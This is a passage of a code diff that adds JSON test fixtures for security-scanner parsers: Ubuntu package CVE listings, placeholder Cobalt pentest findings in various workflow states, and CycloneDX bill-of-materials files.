"coreutils", + "featureversion": "8.28-1ubuntu1", + "vulnerability": "CVE-2016-2781", + "namespace": "ubuntu:18.04", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-2781", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "libgcrypt20", + "featureversion": "1.8.1-4ubuntu1.1", + "vulnerability": "CVE-2019-12904", + "namespace": "ubuntu:18.04", + "description": "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload side-channel attack because physical addresses are available to other processes. (The C implementation is used on platforms where an assembly-language implementation is unavailable.)", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-12904", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "shadow", + "featureversion": "1:4.5-1ubuntu2", + "vulnerability": "CVE-2013-4235", + "namespace": "ubuntu:18.04", + "description": "TOCTOU race conditions by copying and removing directory trees", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2013-4235", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2015-8985", + "namespace": "ubuntu:18.04", + "description": "The pop_fail_stack function in the GNU C Library (aka glibc or libc6) allows context-dependent attackers to cause a denial of service (assertion failure and application crash) via vectors related to extended regular expression processing.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2015-8985", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2019-9169", + "namespace": "ubuntu:18.04", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, proceed_next_node in posix/regexec.c has a heap-based buffer over-read via an attempted case-insensitive regular-expression match.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-9169", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2009-5155", + "namespace": "ubuntu:18.04", + "description": "In the GNU C Library (aka glibc or libc6) before 2.28, parse_reg_exp in posix/regcomp.c misparses alternatives, which allows attackers to cause a denial of service (assertion failure and application exit) or trigger an incorrect result by attempting a regular-expression match.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2009-5155", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "shadow", + "featureversion": "1:4.5-1ubuntu2", + "vulnerability": "CVE-2018-7169", + "namespace": "ubuntu:18.04", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used \"group blacklisting\" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-7169", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2019-9192", + "namespace": "ubuntu:18.04", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-9192", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "pcre3", + "featureversion": "2:8.39-9", + "vulnerability": "CVE-2017-7246", + "namespace": "ubuntu:18.04", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7246", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "pcre3", + "featureversion": "2:8.39-9", + "vulnerability": "CVE-2017-7245", + "namespace": "ubuntu:18.04", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7245", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2019-7309", + "namespace": "ubuntu:18.04", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, the memcmp function for the x32 architecture can incorrectly return zero (indicating that the inputs are equal) because the RDX most significant bit is mishandled.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-7309", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2016-10228", + "namespace": "ubuntu:18.04", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.25 and earlier, when invoked with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10228", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "util-linux", + "featureversion": "2.31.1-0.4ubuntu3.4", + "vulnerability": "CVE-2018-7738", + "namespace": "ubuntu:18.04", + "description": "In util-linux before 2.32-rc1, bash-completion/umount allows local users to gain privileges by embedding shell commands in a mountpoint name, which is mishandled during a umount command (within Bash) by a different user, as demonstrated by logging in as root and entering umount followed by a tab character for autocompletion.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-7738", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "ncurses", + "featureversion": "6.1-1ubuntu1.18.04", + "vulnerability": "CVE-2019-17595", + "namespace": "ubuntu:18.04", + "description": "There is a heap-based buffer over-read in the fmt_entry function in tinfo/comp_hash.c in the terminfo library in ncurses before 6.1-20191012.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-17595", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "ncurses", + "featureversion": "6.1-1ubuntu1.18.04", + "vulnerability": "CVE-2019-17594", + "namespace": "ubuntu:18.04", + "description": "There is a heap-based buffer over-read in the _nc_find_entry function in tinfo/comp_hash.c in the terminfo library in ncurses before 6.1-20191012.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-17594", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "dpkg", + "featureversion": "1.19.0.5ubuntu2.2", + "vulnerability": "CVE-2017-8283", + "namespace": "ubuntu:18.04", + "description": "dpkg-source in dpkg 1.3.0 through 1.18.23 is able to use a non-GNU patch program and does not offer a protection mechanism for blank-indented diff hunks, which allows remote attackers to conduct directory traversal attacks via a crafted Debian source package, as demonstrated by use of dpkg-source on NetBSD.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-8283", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "libtasn1-6", + "featureversion": "4.13-2", + "vulnerability": "CVE-2018-1000654", + "namespace": "ubuntu:18.04", + "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-1000654", + "severity": "Negligible", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2018-20796", + "namespace": "ubuntu:18.04", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-20796", + "severity": "Negligible", + "fixedby": "" + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_many_vul.json b/unittests/scans/cobalt_api/cobalt_api_many_vul.json new file mode 100644 index 00000000000..0f12397f8ff --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_many_vul.json @@ -0,0 +1,130 @@ +{ + "data": [ + { + "resource": { + "id": "vu_2wXY3bq", + "tag": "#PT3334_37", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 5, + "likelihood": 4, + "severity": "high", + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-04-01T15:13:24.322Z" + }, + { + "action": "likelihood_changed", + "value": 4, + "timestamp": "2021-04-02T15:14:05.856Z" + }, + { + "action": "impact_changed", + "value": 5, + "timestamp": "2021-04-03T15:14:05.856Z" + }, + { + "action": "state_changed", + "value": "wont_fix", + "timestamp": "2021-04-04T15:14:06.757Z" + }, + { + "action": "state_changed", + "value": "need_fix", + "timestamp": "2021-04-05T15:14:57.845Z" + } + ], + "state": "need_fix" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + }, + { + "resource": { + "id": "vu_3wXY4bq", + "tag": "#PT3334_38", + "title": "Cross Site Scripting", + "description": "A XSS injection attack...", + "type_category": "XSS", + "labels": [], + "impact": 3, + "likelihood": 4, + "severity": "medium", + "affected_targets": [ + "https://example.org" + ], + "proof_of_concept": "Do this...", + "suggested_fix": "Ensure that...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-05-01T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "check_fix", + "timestamp": "2021-05-02T15:14:57.845Z" + } + ], + "state": "check_fix" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + }, + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "Missing firewall", + "description": "A firewall is...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": "low", + "affected_targets": [ + "https://example.co.uk" + ], + "proof_of_concept": "Enable this and that...", + "suggested_fix": "Be sure to...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-06-01T15:13:24.322Z" + }, + { + "action": "likelihood_changed", + "value": 1, + "timestamp": "2021-06-02T15:14:05.856Z" + } + ], + "state": "carried_over" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_carried_over.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_carried_over.json new file mode 100644 index 00000000000..e327a2ad8c2 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_carried_over.json @@ -0,0 +1,42 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "Missing firewall", + "description": "A firewall is...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": "low", + "affected_targets": [ + "https://example.co.uk", + "https://example.de" + ], + "proof_of_concept": "Try this...", + "suggested_fix": "Be sure to...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-06-03T15:13:24.322Z" + }, + { + "action": "likelihood_changed", + "value": 1, + "timestamp": "2021-06-05T15:14:05.856Z" + } + ], + "state": "carried_over" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_check_fix.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_check_fix.json new file mode 100644 index 00000000000..b1dd3f526d1 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_check_fix.json @@ -0,0 +1,41 @@ +{ + "data": [ + { + "resource": { + "id": "vu_3wXY4bq", + "tag": "#PT3334_38", + "title": "Cross Site Scripting", + "description": "A XSS injection attack...", + "type_category": "XSS", + "labels": [], + "impact": 3, + "likelihood": 4, + "severity": "medium", + "affected_targets": [ + "https://example.org" + ], + "proof_of_concept": "Do this...", + "suggested_fix": "Ensure that...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-05-11T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "check_fix", + "timestamp": "2021-05-12T15:14:57.845Z" + } + ], + "state": "check_fix" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_invalid.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_invalid.json new file mode 100644 index 00000000000..54c43174314 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_invalid.json @@ -0,0 +1,41 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": "low", + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-01-01T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "invalid", + "timestamp": "2021-01-02T15:14:57.845Z" + } + ], + "state": "invalid" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_need_fix.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_need_fix.json new file mode 100644 index 00000000000..80c3ad35d46 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_need_fix.json @@ -0,0 +1,56 @@ +{ + "data": [ + { + "resource": { + "id": "vu_2wXY3bq", + "tag": "#PT3334_37", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 5, + "likelihood": 4, + "severity": "high", + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-04-01T15:13:24.322Z" + }, + { + "action": "likelihood_changed", + "value": 4, + "timestamp": "2021-04-02T15:14:05.856Z" + }, + { + "action": "impact_changed", + "value": 5, + "timestamp": "2021-04-03T15:14:05.856Z" + }, + { + "action": "state_changed", + "value": "wont_fix", + "timestamp": "2021-04-04T15:14:06.757Z" + }, + { + "action": "state_changed", + "value": "need_fix", + "timestamp": "2021-04-05T15:14:57.845Z" + } + ], + "state": "need_fix" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_new.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_new.json new file mode 100644 index 00000000000..7cfaae08f63 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_new.json @@ -0,0 +1,36 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": null, + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-01-01T15:13:24.322Z" + } + ], + "state": "new" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_out_of_scope.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_out_of_scope.json new file mode 100644 index 00000000000..a6e7215150b --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_out_of_scope.json @@ -0,0 +1,41 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": "low", + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-01-01T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "out_of_scope", + "timestamp": "2021-01-02T15:14:57.845Z" + } + ], + "state": "out_of_scope" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_triaging.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_triaging.json new file mode 100644 index 00000000000..bd08e795570 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_triaging.json @@ -0,0 +1,41 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": null, + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-01-01T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "triaging", + "timestamp": "2021-01-02T15:14:57.845Z" + } + ], + "state": "triaging" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_valid_fix.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_valid_fix.json new file mode 100644 index 00000000000..e97a080ff26 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_valid_fix.json @@ -0,0 +1,46 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": "low", + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-01-01T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "need_fix", + "timestamp": "2021-01-02T15:14:57.845Z" + }, + { + "action": "state_changed", + "value": "valid_fix", + "timestamp": "2021-01-03T15:14:57.845Z" + } + ], + "state": "valid_fix" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_one_vul_wont_fix.json b/unittests/scans/cobalt_api/cobalt_api_one_vul_wont_fix.json new file mode 100644 index 00000000000..ceaaf814ac9 --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_one_vul_wont_fix.json @@ -0,0 +1,41 @@ +{ + "data": [ + { + "resource": { + "id": "vu_5wXY6bq", + "tag": "#PT3334_39", + "title": "SQL Injection", + "description": "A SQL injection attack...", + "type_category": null, + "labels": [], + "impact": 1, + "likelihood": 1, + "severity": "low", + "affected_targets": [ + "https://example.com" + ], + "proof_of_concept": "Do this than that...", + "suggested_fix": "Ensure this...", + "pentest_id": "pt_NR5CDkK", + "asset_id": "as_cwrsqsL", + "log": [ + { + "action": "created", + "timestamp": "2021-01-01T15:13:24.322Z" + }, + { + "action": "state_changed", + "value": "wont_fix", + "timestamp": "2021-01-02T15:14:57.845Z" + } + ], + "state": "wont_fix" + }, + "links": { + "ui": { + "url": "https://api.cobalt.io/links/long-web-app-redirect-to-this-finding" + } + } + } + ] +} diff --git a/unittests/scans/cobalt_api/cobalt_api_zero_vul.json b/unittests/scans/cobalt_api/cobalt_api_zero_vul.json new file mode 100644 index 00000000000..f93ccdf4b7b --- /dev/null +++ b/unittests/scans/cobalt_api/cobalt_api_zero_vul.json @@ -0,0 +1 @@ +{"data":[]} diff --git a/unittests/scans/cyclonedx/cyclonedx_cwe.json b/unittests/scans/cyclonedx/cyclonedx_cwe.json new file mode 100644 index 00000000000..8e56c799a92 --- /dev/null +++ b/unittests/scans/cyclonedx/cyclonedx_cwe.json @@ -0,0 +1 @@ +{"bomFormat":"CycloneDX","specVersion":"1.4","version":"1","serialNumber":"fb206469-0178-4dec-9397-987f51f4d4e0","vulnerabilities":[{"id":"CVE-2018-10054","source":{"url":"https://www.exploit-db.com/exploits/44422/","name":"Vendor Disclosure"},"ratings":[{"score":6.5,"severity":"medium","method":"CVSSv2","vector":"AV:N/AC:L/Au:S/C:P/I:P/A:P"},{"score":8.8,"severity":"high","method":"CVSSv3","vector":"AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}],"created":"2018-06-25T00:00:00.000+0000","published":"2018-03-29T00:00:00.000+0000","updated":"2022-06-17T00:00:00.000+0000","cwes":[20],"description":"Arbitrary Code Execution H2 Database Engine is vulnerable to arbitrary code execution.It allows an authorized user to inject arbitrary java code using H2 SQL ALIAS command `CREATE ALIAS`.","affects":[{"ref":"maven:com.h2database:h2:2.1.210:"}],"properties":[{"name":"Vulnerability Link","value":"https://www.exploit-db.com/exploits/44422/"},{"name":"Vulnerability Link","value":"https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html"},{"name":"Vulnerability Link","value":"http://blog.datomic.com/2018/03/important-security-update.html"},{"name":"Vulnerability Link","value":"https://forum.datomic.com/t/important-security-update-0-9-5697/379"},{"name":"Vulnerability Link","value":"https://github.com/h2database/h2database/blob/f97a3dcc856c012b45112cea48d0f1e1bc5518b4/h2/src/main/org/h2/server/web/WebServer.java#L279-L280"},{"name":"Vulnerability Link","value":"https://github.com/h2database/h2database/blob/f97a3dcc856c012b45112cea48d0f1e1bc5518b4/h2/src/main/org/h2/server/web/WebServer.java#L267"},{"name":"Vulnerability Link","value":"https://lists.apache.org/thread.html/582d4165de6507b0be82d5a6f9a1ce392ec43a00c9fed32bacf7fe1e@%3Cuser.ignite.apache.org%3E"}]}]} diff --git a/unittests/scans/cyclonedx/jake.json b/unittests/scans/cyclonedx/jake.json new file mode 100644 index 00000000000..93333275c4e --- /dev/null +++ b/unittests/scans/cyclonedx/jake.json @@ -0,0 +1,602 @@ +{ + "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", + "bomFormat": "CycloneDX", + "specVersion": "1.4", + "serialNumber": "urn:uuid:121d3591-2fa5-46f1-bf7f-8647df93fa82", + "version": 1, + "metadata": { + "timestamp": "2022-01-23T21:32:26.030422+00:00", + "tools": [ + { + "vendor": "CycloneDX", + "name": "cyclonedx-python-lib", + "version": "1.1.1", + "externalReferences": [ + { + "type": "build-system", + "url": "https://github.com/CycloneDX/cyclonedx-python-lib/actions" + }, + { + "type": "distribution", + "url": "https://pypi.org/project/cyclonedx-python-lib/" + }, + { + "type": "documentation", + "url": "https://cyclonedx.github.io/cyclonedx-python-lib/" + }, + { + "type": "issue-tracker", + "url": "https://github.com/CycloneDX/cyclonedx-python-lib/issues" + }, + { + "type": "license", + "url": "https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE" + }, + { + "type": "release-notes", + "url": "https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md" + }, + { + "type": "vcs", + "url": "https://github.com/CycloneDX/cyclonedx-python-lib" + }, + { + "type": "website", + "url": "https://cyclonedx.org" + } + ] + } + ] + }, + "components": [ + { + "type": "library", + "author": "Andrey Petrov", + "name": "urllib3", + "version": "1.26.8", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/urllib3@1.26.8" + }, + { + "type": "library", + "name": "types-toml", + "version": "0.10.1", + "licenses": [ + { + "expression": "Apache-2.0 license" + } + ], + "purl": "pkg:pypi/types-toml@0.10.1" + }, + { + "type": "library", + "name": "types-setuptools", + "version": "57.4.4", + "licenses": [ + { + "expression": "Apache-2.0 license" + } + ], + "purl": "pkg:pypi/types-setuptools@57.4.4" + }, + { + "type": "library", + "author": "William Pearson", + "name": "toml", + "version": "0.10.2", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/toml@0.10.2" + }, + { + "type": "library", + "author": "Markus Siemens", + "name": "tinydb", + "version": "4.6.1", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/tinydb@4.6.1" + }, + { + "type": "library", + "author": "Python Packaging Authority", + "name": "setuptools", + "version": "58.1.0", + "purl": "pkg:pypi/setuptools@58.1.0" + }, + { + "type": "library", + "author": "Will McGugan", + "name": "rich", + "version": "11.0.0", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/rich@11.0.0" + }, + { + "type": "library", + "author": "Kenneth Reitz", + "name": "requests", + "version": "2.27.1", + "licenses": [ + { + "expression": "Apache 2.0" + } + ], + "purl": "pkg:pypi/requests@2.27.1" + }, + { + "type": "library", + "author": "Stuart Bishop", + "name": "pytz", + "version": "2021.3", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/pytz@2021.3" + }, + { + "type": "library", + "author": "Georg Brandl", + "name": "Pygments", + "version": "2.11.2", + "licenses": [ + { + "expression": "BSD License" + } + ], + "purl": "pkg:pypi/pygments@2.11.2" + }, + { + "type": "library", + "author": "A lot of people", + "name": "pyflakes", + "version": "2.4.0", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/pyflakes@2.4.0" + }, + { + "type": "library", + "author": "Peter Waller (Thanks to Christopher Jones and Stefano Rivera)", + "name": "pyfiglet", + "version": "0.8.post1", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/pyfiglet@0.8.post1" + }, + { + "type": "library", + "author": "Johann C. Rocholl", + "name": "pycodestyle", + "version": "2.8.0", + "licenses": [ + { + "expression": "Expat license" + } + ], + "purl": "pkg:pypi/pycodestyle@2.8.0" + }, + { + "type": "library", + "author": "Donal Mee", + "name": "polling2", + "version": "0.5.0", + "purl": "pkg:pypi/polling2@0.5.0" + }, + { + "type": "library", + "author": "The pip developers", + "name": "pip", + "version": "21.2.4", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/pip@21.2.4" + }, + { + "type": "library", + "author": "the purl authors", + "name": "packageurl-python", + "version": "0.9.6", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/packageurl-python@0.9.6" + }, + { + "type": "library", + "author": "Paul Horton", + "name": "ossindex-lib", + "version": "0.2.1", + "licenses": [ + { + "expression": "Apache-2.0" + } + ], + "purl": "pkg:pypi/ossindex-lib@0.2.1" + }, + { + "type": "library", + "author": "Ian Cordasco", + "name": "mccabe", + "version": "0.6.1", + "licenses": [ + { + "expression": "Expat license" + } + ], + "purl": "pkg:pypi/mccabe@0.6.1" + }, + { + "type": "library", + "author": "Sonatype Community", + "name": "jake", + "version": "1.4.0", + "licenses": [ + { + "expression": "Apache-2.0" + } + ], + "purl": "pkg:pypi/jake@1.4.0" + }, + { + "type": "library", + "author": "Kim Davies", + "name": "idna", + "version": "3.3", + "licenses": [ + { + "expression": "BSD-3-Clause" + } + ], + "purl": "pkg:pypi/idna@3.3" + }, + { + "type": "library", + "author": "Tarek Ziade", + "name": "flake8", + "version": "4.0.1", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/flake8@4.0.1" + }, + { + "type": "library", + "author": "Django Software Foundation", + "name": "Django", + "version": "2.0.1", + "licenses": [ + { + "expression": "BSD" + } + ], + "purl": "pkg:pypi/django@2.0.1" + }, + { + "type": "library", + "author": "Paul Horton", + "name": "cyclonedx-python-lib", + "version": "1.1.1", + "licenses": [ + { + "expression": "Apache-2.0" + } + ], + "purl": "pkg:pypi/cyclonedx-python-lib@1.1.1" + }, + { + "type": "library", + "author": "Steven Springett", + "name": "cyclonedx-bom", + "version": "2.0.0", + "licenses": [ + { + "expression": "Apache-2.0" + } + ], + "purl": "pkg:pypi/cyclonedx-bom@2.0.0" + }, + { + "type": "library", + "author": "Bibek Kafle , Roland Shoemaker ", + "name": "commonmark", + "version": "0.9.1", + "licenses": [ + { + "expression": "BSD-3-Clause" + } + ], + "purl": "pkg:pypi/commonmark@0.9.1" + }, + { + "type": "library", + "author": "Jonathan Hartley", + "name": "colorama", + "version": "0.4.4", + "licenses": [ + { + "expression": "BSD" + } + ], + "purl": "pkg:pypi/colorama@0.4.4" + }, + { + "type": "library", + "author": "Ahmed TAHRI @Ousret", + "name": "charset-normalizer", + "version": "2.0.10", + "licenses": [ + { + "expression": "MIT" + } + ], + "purl": "pkg:pypi/charset-normalizer@2.0.10" + }, + { + "type": 